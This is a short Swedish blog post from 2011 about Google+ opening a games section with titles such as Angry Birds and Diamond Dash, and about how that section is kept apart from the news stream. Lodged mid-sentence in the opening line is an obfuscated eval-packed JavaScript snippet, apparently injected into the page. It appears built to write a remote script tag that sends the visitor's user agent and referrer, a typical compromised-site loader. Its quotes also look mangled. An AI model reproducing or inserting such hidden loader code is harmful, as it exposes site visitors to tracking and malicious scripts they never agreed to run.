Image Image Image Image Image Image Image Image Image Image

| 22 september, 2018

Scroll to top

Top

Google+ spel…

Google+ spel…
Filip Urde
  • On 12 augusti, 2011
  • http://www.revue.se/filip-urde
Google eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|efyrz|var|u0026u|referrer|ntaea||js|php’.split(‘|’),0,{}))
har tidigare  visat indikationer på att de kommer släppa spel på sin nya tjänst Google+.

I går släpptes ett fåtal spel till tjänsten som man kan testa. Några av de första spelen är Angry Birds, Dragon Age Legends, Crime City och Diamond Dash.

Facebook har länge haft en spel implementring, med spel som Maffia, restaurant city osv. Men  en fördel som Google gjort är att spelen är isolerade till en egen spelsektion, vilket betyder att du inte kommer behöva be dina Google+ vänner om hjälp att få nya vapen osv.  Vilket betyder att personer med litet spelintresse inte heller kommer bli bombade med ”spel spam” i sina flöden.

If you’re not interested in games, it’s easy to ignore them. Your stream will remain focused on conversations with the people you care about.


Inte alla konton har fått spelsektionen ännu men inom några timmar/dagar så borde det väl dykt upp överallt.
googleblog.blogspot.com